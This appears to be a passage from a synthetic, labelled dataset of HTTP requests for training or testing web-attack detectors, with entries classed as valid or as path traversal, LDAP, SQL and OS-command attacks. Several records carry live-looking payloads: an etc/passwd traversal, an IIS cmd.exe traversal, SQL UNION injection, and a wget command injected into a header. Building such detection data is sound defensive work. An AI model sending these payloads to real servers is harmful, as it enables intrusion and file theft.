Proxy-Authorization: NTLM dDdzZXMwbHV4V3I3dG1vZGlyYWVvZmFhaGVzaHNzc3RzZU9XWjBmb2NvSGU=
Authorization: NTLM bXRlZm5obk9FY2VlZlJydHlvZWFldGJ3bmV1c25hc2l0SHVzVnBsYWE1V3I=
Range: -3610,072048-063,-8
Referer: /eftea/ebturfs/ohlyI/lsthos/tpsnieD.pdf
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/3.2 (compatible; MSIE 2.4; SunOS sun4u; ohah; sealnhtasa)
UA-CPU: PowerPC
UA-Disp: 3763,8529,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 154x2368
Via: 2.1 www.ileEue.htm:4, HTTP/0.3 www.ltt7Oti.tiff, HTTP/0.4 68.154.59.201:0
Transfer-Encoding: identity
Upgrade: oxpen/0.0
Warning: 532 27.1.62.77 "o9ljtfr2eo5T2tvoe" 
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 63629752073074
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15077
Start - Id: 30383
class: Valid
GET /khjcEu.XX-aOnF4.sh?mtt3eioqw=54w%24u&nRcgeg=%27imgu5jnc%3Chglni&oaorhot=ywgjDscriptathQoaae HTTP/1.0
Host: 18.93.224.235
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ise8-le;q=0.7
Cache-Control: only-if-cached
Client-ip: 116.125.168.110
Cookie: usiRoeme1=4;ysoQvobnoTvs=ho;pius3pSrcn1=6590519545;f9xvdOoanh=(gkShttsw1s;cnewrgK=Uqlrmroleneb;bpSnZCc_=3152
Cookie2: $Version="838"
Date: Fri, 02 Feb 07 19:21:07 UTC
ETag: W/"h54s0OY2yY1ehAm1hjup"
Expect: irloe=dsKep;sb3ik
From: eonljol@h9iohse.fr
If-Modified-Since: Sat, 21 Nov 09 07:32:08 UTC
If-Unmodified-Since: Sat, 08 Apr 06 24:31:25 UTC
If-Match: *
If-None-Match: *
If-Range: "BxmgI2x_taHLW6LYE5"
Max-Forwards: 8558
MIME-Version: 4.2
Pragma: hRPstk=efe
Proxy-Authorization: ltwa aarnA=yustwx
Authorization: Basic b2h0aHQ6b3JwdG8=
Range: -4
Referer: http://wric9t.it/tnhi8/dnOh.wmn
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: adeyldsn7hcrtgsuisyc
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9503x4246
Via: FTP/1.5 www.ktiiIgor.png, 6.2 www.8mIq.htm:4, 0.9 148.187.118.130
Transfer-Encoding: oaf1
Upgrade: he9op/7.5, Nlo/1.8
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30383
Start - Id: 28912
class: Valid
GET /m@j@cnLnzs/aqttrh3e5/tenenesjh/s9-5Y/ZX6Q65passwdzwp-0Rh/tKCO8@nFD3woKEr/MJJ_.cfm?ytlmahoehele=741 HTTP/1.1
Host: www.dpTg.be:80
Connection: okants
Accept: video/mpeg;q=0.8, text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 189.113.60.102
Cookie: wq2L2F=7;9dnl@K-3=he7rdrIswefhtairTt;mDSuchoo=aytesies;IuWK_=odshhtl4niI2ahhe1e;a0ined=n@uaiex
Cookie2: $Version="054"
Date: Mon, 12 Apr 10 18:24:19 UTC
ETag: "9Q0MBIzn_p4B.dvZn1l"
Expect: 100-continue
From: em2nped@eail.de
If-Modified-Since: Sat, 11 Apr 09 08:34:27 UTC
If-Unmodified-Since: Mon, 28 Feb 05 04:47:46 CET
If-Match: "MYz9cdagIEaJTRT7_YTu"
If-None-Match: *
If-Range: Sat, 27 Sep 08 05:40:16 GMT
Max-Forwards: 7230
MIME-Version: 9.1
Pragma: scOf='tC'
Proxy-Authorization: Basic aDl1YW9GOTphbm5oZQ==
Authorization: Digest opaque="5ols"
Range: 492-,-067,215329-8229
Referer: http://www.wAan.org/tuTg/jtgcii.js
TE: gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.6 (X11; U; Open BSD i586 5.8; re-ue; rv:4.3.4) Gecko/06663530
UA-CPU: StrongARM
UA-Disp: 586,8416,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4214x6958
Via: 6.3 12.155.0.215
Transfer-Encoding: identity
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 209 www.lust7.js:12042 "fiu51is" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 2568531119908025423
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28912
Start - Id: 12475
class: Valid
GET /acaeooo6/cPv@V1qA/krpq/e8QFg/eePyaemscmtleiF/DdgOY0Z-6-0c/tOohu6k-ZBwzA_-.cfm?@qa0@VstyleNEPUf=nidnxi1bdeletee&nosanner=71620&ZundtHnd5aalecr=npm&7tnaihbgtfO=31181&eomameonom=vlphps HTTP/1.1
Host: www.sh3aeilT.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=44
Client-ip: 71.219.22.11
Cookie: _VUDcBSIUv=43
Cookie2: $Version="4"
Date: Wed, 25 Jul 07 15:45:49 CET
ETag: W/"ysFV2@WM0CqMD-G"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: a0lewqe@txeohoo.be
If-Modified-Since: Sat, 01 Jan 05 20:19:19 CET
If-Unmodified-Since: Wed, 07 Jan 09 05:33:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 5.9
Pragma: tmg='t'
Proxy-Authorization: Digest qop=ttetoa
Authorization: NTLM d2l0RXRubmdycGZyaHN5c3M5NGZjZW1zdTlscml0dEt0U3R0aGVzcmVkYXNh
Range: 3-331
Referer: /sqa0aHe/fu9iABie.nsf
TE: chunked;q=0.1
Trailer: Upgrade
User-Agent: w68kcC0V http://www.eenS.uk
UA-CPU: StrongARM
UA-Disp: 711,789,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5087x279
Via: HTTP/3.0 www.feinl.jpg
Transfer-Encoding: deflate
Upgrade: au0l/8.8, 5inEe/6.6, Dsl/5.0, semn/7.4, sa3exa/5.2
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12475
Start - Id: 46090
class: PathTransversal
POST /iR_tKKEQa8a65/htEnltS/tv5q4nr9nhP5@41rQ-B/3ao.nsf? HTTP/1.1
Content-Length: 209
Content-Language: ln9rt
Content-Encoding: identity
Content-Location: /senec/hiieiNti/tm6kkhoa.js
Content-MD5: aXRpcG9obEV0bHVENmF5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 22 Aug 07 17:48:49 UTC
Host: www.i8ohueu.de
Connection: xetrkxaf
Accept: audio/x-wav
Accept-Charset: x-mac-icelandic, iso-2022-kr, euc-kr;q=0.7, utf-7;q=0.1, windows-1258
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: min-fresh=1148
Client-ip: 189.254.153.1
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Fri, 10 Jun 05 05:51:20 GMT
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 935
MIME-Version: 4.9
Pragma: yesr='an'
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: iet9 phlsibs=tbjfe
Referer: /n0llg.conf
TE: trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 5.8; eo-2x; rv:9.8.3) Gecko/65966523
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: compress
Warning: 420 www.aarl.jpeg "rnaiov" "Tue, 29 Nov 05 09:15:49 CET"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BidFenm3c=eeqreuRypn4csl&aiymwes217tsns=tl-Xjpr&Kktvdsg=\.\.\/\.\.\/etc\/passwd&onlbdchtad8a=ldc&asrr=(GBmuvare:s]&hi7=t]ldadsw-rscriptudeletee&tatt8Tn=07&feiad=7&xevLrerqaOeisa=062

End - Id: 46090
Start - Id: 37677
class: LdapInjection
POST /emfll4os8cIeejux/1x/if41ee/hCx20zVZyQXuB/wusr7@PioDf/ttqRiYE8-5Q/Op4eQeconnect/ePQD/.Zap-22rt1X/sp5le-XH@wOwXjlqwlrX/vT8EqY7M/oE.php3? HTTP/1.0
Content-Length: 301
Content-Language: iy9u5n
Content-Encoding: gzip
Content-Location: http://www.evZeOitn.fr/eehtt/dtxlrrVe/7et7/t3pnm.aspx
Content-MD5: ZW5hdHd1d2VZcHJhbW9ucQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Apr 08 21:53:53 GMT
Last-Modified: Tue, 17 Mar 09 18:49:07 UTC
Host: 185.62.9.193:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: EOvY-g;q=0.3, tny-asEAitas
Cache-Control: vciaias=b
Client-ip: 71.214.180.23
Cookie: pd0eT=83879;bSLok=ahShbyee;lseZrchtsetes3=aj;WZshutdownXItxunionvHsB=ijZ;sSo3lHuttNoaHeJ=h.RIEx;t3jeoigrpemy=0995
Cookie2: $Version="65"
Date: Wed, 14 Jan 04 24:28:57 UTC
ETag: "loLaNmei9ru@mP9sc@d"
Expect: eenen
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 30 Mar 08 15:55:32 CET
If-Unmodified-Since: Sun, 22 Feb 09 18:20:10 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: "gCmDnTP8Ts5Rlvd9-"
If-Range: "vp@jb9@-9zMChTqEUXR"
Max-Forwards: 0654
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: /naeohp.conf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.4 (compatible; MSIE 4.9; Open BSD i386; aiezna; nONmtno)
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 8.1 160.31.218.45, 1.1 www.gcyre.gif, HTTP/4.5 208.102.198.163
Transfer-Encoding: ssmo
Upgrade: pemoEi/4.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

k5axe=iso8/&mr0hGJi94AYM=nro'eh7Blink&qt=s&Iltexrar7syifK=7143&sEubDe5upvnu=")(targetfilter=(o=NetscapeRoot))&erowgnepfhuai=694&grh6noew=smrl&sosos1tl=rUzG-TnuYSlt&DlzZCKrh2vx=e&l6iniEp8bntoes4=3VS9L0@&2neevfiieLidt=aeqclcn&tTtK0tietharau=]\sel&6ii1la1tu3aC=nnD3otaeneIk&oy=6

End - Id: 37677
Start - Id: 20693
class: Valid
GET /yooneya/zL8ej.exe? HTTP/1.0
Host: 78.142.144.26
Connection: r5k6Dhde
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.7, windows-1257
Accept-Encoding: 
Accept-Language: feAm3-otrh1us;q=0.5, e-amewapw, sAAeIn-s;q=0.2
Cache-Control: no-transform
Client-ip: 195.225.219.90
Cookie: nb0aE=sTqFhAttgohhSo;cntr=1;4so7o2nr48Sm=f.VL;selOutbte=iat
Cookie2: $Version="37"
Date: Thu, 11 Mar 10 09:35:26 GMT
ETag: "649MQApKJ2VfT94JgRT"
Expect: 100-continue
From: Eenieeb@jtsh.ch
If-Modified-Since: Mon, 08 May 06 11:34:30 GMT
If-Unmodified-Since: Tue, 22 Jan 08 10:10:19 CET
If-Match: "H9nd7FbLYD9FBHaH4vV"
If-None-Match: *
If-Range: Tue, 23 Dec 08 04:25:44 GMT
Max-Forwards: 795
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: tBcg vehpnncr=v1ee5n
Range: 354-981668
Referer: http://www.onoidshu.org/5sstln/4dk6si.ace
TE: chunked,deflate,chunked;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Windows; U; WinNT 8.8; rd-im; rv:1.0.7) Gecko/02805630
UA-CPU: Sparc
UA-Disp: 8694,520,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 413x553
Via: HTTP/4.1 217.4.100.135, HTTP/1.2 181.239.57.102, HTTP/5.0 www.hmhkee.png
Transfer-Encoding: identity
Upgrade: eelter/7.4, vro/5.9, Mxe/7.9, ha0ne/4.9, 0e6/5.8
Warning: 078 4.18.109.190 "qceetbhebMca6" "Wed, 01 Aug 07 08:37:44 CET"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20693
Start - Id: 44347
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.rprtut4c.be:95
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity
Accept-Language: ier-att;q=0.6, eiaed-ncfah;q=0.4
Cache-Control: f=idnarb
Client-ip: 16.126.199.90
Cookie: ei0seIzt=95766546;lrSv=6458
Cookie2: $Version="06"
Date: Thu, 21 Jul 05 14:00:12 UTC
ETag: "nTSEc@7ERM9WccIu9IhT"
Expect: 100-continue
From: doEfS@ncolillig.de
If-Modified-Since: Mon, 15 Mar 10 09:15:38 GMT
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 780
MIME-Version: 5.1
Pragma: Eiilnn='tisHs'
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: a9cb rpta8oc=nteya
Range: -61939,-108
Referer: http://tinaeesa.cz/ldce9lo/eOuaeena.php3
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: taruuclTrroCfEuycal
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 673x399
Via: 6.3 154.254.103.28
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44347
Start - Id: 10261
class: Valid
GET /tiu/9138mKBX3wDs7UmQAV@.tiff?Siu=7inah HTTP/1.1
Host: 212.71.133.167:3734
Connection: keep-alive
Accept: video/mpeg;q=0.5, video/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 205.176.72.60
Cookie: soshEslrt6s47i5=675661;8y=0winnts1u&/8winntrpSylnhsh);adnllEshbsti=522075890;WWiy5oE0Y=eaerroplh2at4em
Cookie2: $Version="816"
Date: Wed, 06 Apr 05 06:11:30 CET
ETag: W/"Rm_SjCglU0XW-N7CBw-"
Expect: tuaaleh5=ywte
From: re5on@alasreme.gov
If-Modified-Since: Tue, 21 Aug 07 08:18:12 GMT
If-Unmodified-Since: Sat, 30 Jan 10 18:48:04 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 10 10:18:12 CET
Max-Forwards: 3646
MIME-Version: 0.7
Pragma: ee4inht=lc
Proxy-Authorization: aa0et EnnLMv=fsay
Authorization: Basic SWM5ZWVhckU6Nm5vWQ==
Range: 48806-,859-40,-983
Referer: /nnsoby/3asga2O.txt
TE: deflate;q=0.6,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 8.1; ad-hr; rv:1.5.0) Gecko/85350871
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0000x0475
Via: 0.9 www.bud8bshT.tiff
Transfer-Encoding: gzip
Upgrade: shoceh/2.3, belfot/0.4, n5AeS/6.7, pjnr/5.8, itP/7.3
Warning: 381 www.swT2Ci.png "AmssmipzjstT" 
X-Forwarded-For: 75.202.70.37
X-Serial-Number: 7837553364029
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10261
Start - Id: 42932
class: OsCommanding
GET /eOqMM.mUq9ulJA@W/tFXrMdU1Do/oRmCirPE@ChIuij5z/JFB2G4XB/LVJCjKr/eV4mJM7l/soLse/emCT@vcs-B8c/esTO41Zu10PQmz2S5KDH.php3?da=834&egsntsOacJlone=0&eJ7lsEGnr=7&teas=Q HTTP/1.0
Host: 81.50.216.120
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: "   ;    /usr/bin/wget     www.nsolnaitesne.com/rorare    ;
Cache-Control: max-stale=92827
Client-ip: 226.241.221.163
Cookie: tas=30469679;eiia9=04164124
Date: Mon, 30 Mar 09 17:19:10 GMT
ETag: "bT7Oxs21s533t2Ud"
Expect: sreebpa
If-Modified-Since: Sat, 28 Oct 06 13:45:22 CET
If-Unmodified-Since: Fri, 05 Nov 04 16:00:37 GMT
If-Match: "nt9UQJpocLbZeJQE2E7u"
If-Range: Wed, 30 Jun 04 23:11:24 UTC
Max-Forwards: 6
MIME-Version: 4.5
Pragma: iyhe3RAe=shntna
Authorization: NTLM dGVvd2Rld2VjYXM5cjF1eWRpdG5ydGViQmdzaWh5bnczc3ludVJF
Range: 01418-88080,370072-
Referer: /uejz/cnrisut/9tiRas6y/e4Egbhhe/8eaio.tar
Trailer: Range
User-Agent: itrhjhmeeeholhezoso
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Pixels: 512x475
Via: HTTP/2.7 72.36.18.170
Transfer-Encoding: identity
Upgrade: ehi1/8.7, p1nc/9.5

null

End - Id: 42932
Start - Id: 25667
class: Valid
GET /eCNrqnHowhaj9CAK/i1qirbrrer/1@binRVr9PZnG/udggbbyPu0G/eytas.tiff?heiiE=tv&dsmY=eda&rop=hSae6E&r1ySf7tghDlgcil=0624&o0dg=nscehaI&servertett=fhio HTTP/1.1
Host: 71.191.249.158:723
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 6.192.119.3
Cookie: iecoui=71201;zt8oacLxbIh=ri;qOreplaceJ5kUPMRcK=370;sxahtlsp0aeocsn=70808
Cookie2: $Version="81"
Date: Thu, 26 Jan 06 20:08:19 GMT
ETag: "fUrmoEcADl1vOphaKG8T"
Expect: 100-continue
From: jrwaet@5StiLntEa.org
If-Modified-Since: Sun, 08 Nov 09 16:07:27 GMT
If-Unmodified-Since: Sat, 06 Mar 10 08:54:05 CET
If-Match: *
If-None-Match: "-o6EYA@EQvBX3H-x0S@"
If-Range: Fri, 23 May 08 22:51:37 CET
Max-Forwards: 9
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM YXNyc2FjWXNndG51Y3B5dTd0dzl1N3RzMnI5ZW5yY3VwdG1ic2N1aQ==
Range: 39509-,-41,-519051
Referer: /eUUfjo1o/lgloXdr/nnet/dslz.cgi
TE: trailers,deflate;q=0.6,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 8.3; xw-re; rv:1.3.4) Gecko/18826893
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8973x257
Via: 3.0 www.onnbcD.htm
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25667
Start - Id: 37035
class: LdapInjection
GET /lDZ@B9Sf8/e06KcGaNBa1y.uzt.exe?loaepnqaj9g=mfOnt+fOaiie&ntdhenenp=eM4o2tqrxB&edZpaneroamHibt=tymrele&eCShro1u3YeHede=66795&vtrassymlduCast=bt+&tnjxfiyahbt5tr=cF3a2&aeo9seti=oobjectdreaiocrylusrlocatione+wget5si&Ztdrcsydstv=6293031&azeAssts1=27&tsc7jhNtehra=%29+%28%7C+%28ty%3Db0iAl*%29&Priss5d4YN=a1EeapdmEashs3wt HTTP/1.1
Host: 25.59.13.54
Connection: close
Accept: application/*;q=0.8, application/*;q=0.0, application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: o5le-ocIwten, d-q;q=0.7, r-nj7twa, n-uHAuw;q=0.9, cW2m4ehH-u
Cache-Control: min-fresh=8
Client-ip: 55.15.65.177
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Wed, 30 Jan 08 05:41:58 GMT
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: ugo11f@oeeH7o.uk
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Sat, 07 Jun 08 23:03:19 GMT
If-Match: *
If-None-Match: "3HoswvUcy0hD4wB"
If-Range: Thu, 05 Nov 09 22:08:24 GMT
Max-Forwards: 07
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://ioe3f.uk/oTmognso/mdop/oonienBc.php3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.1 (compatible; MSIE 4.7; Win98; Eor5c2r4SE; eaowRo)
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/7.1 www.itoyhei.shtml
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 910 87.165.204.86 "o8yso" "Mon, 08 Oct 07 11:23:20 UTC"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37035
Start - Id: 27434
class: Valid
GET /rd9uiEw8Aeersltenihw/adkiqli/brins8ttsa/e_A/6etAtlddusAghsainna4/VzQ/thsbwouAseoefrb6ebvb/whXv5/izeOtrotbdre.dll?uPtpa6=ho&fettyup7=%40rN&niaioytchna=68 HTTP/1.1
Host: www.a5awoiiA.org
Connection: close
Accept: video/mpeg;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 54.17.98.207
Cookie: EaeciulaaEs=hrsdiv
Cookie2: $Version="49"
Date: Wed, 20 Jul 05 01:31:11 GMT
ETag: "TxkeDqa15iDuNrb0yk"
Expect: 7rml
From: mkpuh@Norr.org
If-Modified-Since: Thu, 13 Dec 07 20:24:47 UTC
If-Unmodified-Since: Tue, 20 May 08 16:54:49 UTC
If-Match: "-TRadkaDyNQibc-"
If-None-Match: "h-jhpZ1flJsVwIWgg4"
If-Range: "cVCcSaSOFX38mqw1hNq"
Max-Forwards: 8395
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM eWl0ZWxqZXZMc3ZtdFRvM25taWxldGhpb2VyYWRpbkEzZg==
Authorization: Digest qop=ithot
Range: 72-
Referer: http://yhtn.ch/1hhe/tfin/sunoxdn.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (X11; U; Unix 6.7; ai-nn; rv:6.8.4) Gecko/76173130
UA-CPU: x86
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 9.6 www.da5ssplw.jpeg:09
Transfer-Encoding: gzip
Upgrade: aof/7.7, e9Azie/5.3, isosn/8.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 29844122
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27434
Start - Id: 42014
class: SqlInjection
GET /e7sOeic4VrI@4SD@okxh/bUKqlCC9.gif?Awdocument8evalwindow.opensock_streamUQZ=095167&neo1t=OR+%27tnka0nne%27+++++LIKE+%27Sim%25%27&9deoAdO5amDd=r+fetgtslejlArm&qttts=czo&cdetsSardr=nuF9&2ix3p=%3E&VkUOxinsert2=f+&830pJIl=fMa9l&oaraeil=64930&passthruHoS9K0=0&window.open2Zt=93&ftpndintmsrtET=sy&K9watYo6xhdo=3 HTTP/1.1
Host: 215.199.10.162
Connection: keep-alive
Accept: application/postscript;q=0.0, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: acef-de;q=0.1, trsnleh-tshe7, frlo-i3hagh;q=0.9
Cache-Control: min-fresh=006
Client-ip: 209.185.53.108
Cookie: AHB3Ld04y=yoo;ehdltuhek=eYa6
Cookie2: $Version="334"
Date: Sun, 13 Feb 05 04:26:25 CET
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 18 Oct 08 11:49:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 22:02:34 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: oizlT=rdiasam3
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://www.o1Itchec.it/reoOJoa7/ualiac/teeRt/fep71/tioerr.avi
TE: trailers,chunked
Trailer: Trailer
User-Agent: tsasse/4.9.6.2
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 0.2 www.SCjayw9.html, HTTP/9.5 www.gSueiuie.htm
Transfer-Encoding: compress
Upgrade: oNeesa/5.1, old/9.8, 9snek/4.6, 2and/4.1, erjmEs/4.6
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42014
Start - Id: 42108
class: SqlInjection
GET /mf8rAA5tSGS2uhL@/Dbmto/nCBM0di9Q5/eNRURsh.asmx?4lnh=evFeT%40tpl&tavmtdhlSEsv=%27+++%29+++++UNION++ALL+++SELECT++++028+++FROM+ldrmn8r+++WHERE++%28++%27%27%3D+%27&a8eufpatRlato7j=4282874497&rdc4r9jtxn=3101556 HTTP/1.0
Host: 204.2.64.9:4537
Connection: close
Accept: application/x-tar;q=0.9
Accept-Charset: koi8, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: lro='rerk'
Client-ip: 139.71.160.209
Cookie: 3OA=njnrust;Cdd-.M.xterm=T=iframea;talm 3 between
Cookie2: $Version="85"
Date: Tue, 03 May 05 21:19:12 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: elzgh
From: ri9it34@rxsle.fr
If-Modified-Since: Fri, 19 Jun 09 17:38:37 GMT
If-Unmodified-Since: Mon, 19 Feb 07 05:43:37 GMT
If-Match: *
If-None-Match: "8num7ugxL35pbuG7Y"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 985
MIME-Version: 0.9
Pragma: lof=Tc2usg
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Basic cmduYTp0Nm10cnVubg==
Range: 80-3804,023297-91,09-
Referer: /70tn.php
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: ebq6iea (g4JCqp; o7MN-NvE; nx73dk2A1G)
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
